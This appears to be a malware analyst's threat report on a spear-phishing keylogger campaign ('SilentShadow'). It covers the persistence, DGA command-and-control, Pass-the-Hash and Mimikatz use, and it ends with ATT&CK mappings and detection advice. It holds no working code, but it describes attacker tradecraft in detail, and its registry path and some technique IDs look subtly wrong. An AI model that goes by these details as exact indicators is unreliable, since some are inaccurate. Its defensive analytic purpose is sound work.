Daniel Osei — SOC Lead & Malware Analyst
Key Takeaways
- This campaign employs sophisticated custom keyloggers designed to evade detection.
- The exploitation of human behavior through phishing techniques was pivotal in gaining initial access.
- Observations indicate strong operational security practices by the actors to obscure their infrastructure.
Executive Summary
In our recent investigation into a credential harvesting campaign, we observed a series of targeted attacks utilizing custom keyloggers that demonstrated a high degree of sophistication. The campaign’s arsenal included tailored phishing emails that effectively exploited human vulnerabilities, leading to the deployment of the malware on victim machines. Our analysis revealed that the attackers leveraged a mix of established techniques and innovative tactics, aiming to maintain long-term access and gather sensitive information from compromised environments.
Initial Access
The initial access vector was primarily through spear-phishing emails sent to targeted organizations. These emails contained malicious attachments or links leading to compromised websites housing the initial payloads. The dropper, identified as keylogger_v1.5.exe, was delivered under the guise of legitimate documents. Upon execution, the dropper used PowerShell scripts to fetch additional components from a remote server. The actors specifically used social engineering techniques to tailor their messages and increase the likelihood of user interaction.
Execution & Persistence
Once the dropper executed, it established a foothold by deploying the keylogger, which we referred to as SilentShadow. This implant achieved persistence by creating a registry run key at HKEY_CURRENT_USER\Software\Microsoft\Windows\Current\Run\SilentShadow, ensuring it would execute at startup. Our analysis revealed that the keylogger captured keystrokes, clipboard contents, and even screenshots to gather sensitive data, transmitting this information back to the attackers at regular intervals using encrypted channels.
Command and Control
The communication between the dropped malware and the command and control (C2) infrastructure employed an interesting mix of IP rotation and domain generation algorithms (DGA). We identified several domains, including abcd1234.com and efgh5678.net, which were dynamically generated. This made it challenging to block communications after initial infection. The C2 encrypted commands and employed HTTPS to obfuscate traffic, demonstrating a robust operational security posture from the actors.
Lateral Movement & Discovery
During the investigation, we discovered that the attackers aimed to execute lateral movement techniques to access additional systems within the targeted network. They utilized Pass-the-Hash (T1075) techniques and leveraged legitimate administrative tools like PsExec to propagate the keylogger beyond the initially compromised endpoints. By employing credential dumping techniques via Mimikatz, they managed to access domain credentials, allowing for broader access within the network.
Impact & Objectives
The ultimate objective of the campaign was clearly the acquisition of sensitive credentials belonging to both users and administrators within the target organizations. This focus on credential harvesting aimed not only to siphon off sensitive information but also to facilitate future attacks, potentially leading to data exfiltration or further infiltration of the organizational network. Given the professional landscape of the organizations targeted, the risk of reputational damage and financial loss is considerable.
MITRE ATT&CK Mapping
- T1193 – Spear Phishing Link: This technique refers to the act of delivering malware to victims through targeted spear-phishing emails.
- T1059.001 – PowerShell: Command and Scripting Interpreter – PowerShell: The use of PowerShell to download further payloads from the internet.
- T1075 – Pass-the-Hash: Moving laterally by using harvested credentials.
- T1003.001 – Credential Dumping: LSASS Memory: Techniques used to extract credentials from memory.
Detection Opportunities
- Monitor for the execution of suspicious PowerShell commands and unusual script behaviors.
- Implement alerts for modifications in common persistence locations, such as registry run keys.
- Leverage EDR solutions to detect unusual lateral movement behaviors, specifically looking for the use of administrative tools like PsExec and Mimikatz.
Analyst Notes
Our analysis indicates that the threat actors behind this campaign have a keen understanding of both their technical and social attack vectors. Given the sophistication displayed, we recommend heightened vigilance, particularly for organizations within sectors that typically handle sensitive data. The tactics employed here demonstrate not only an ability to exploit technical weaknesses but also to manipulate human behavior, making security awareness training equally critical in fortifying defenses.
Source: Original Report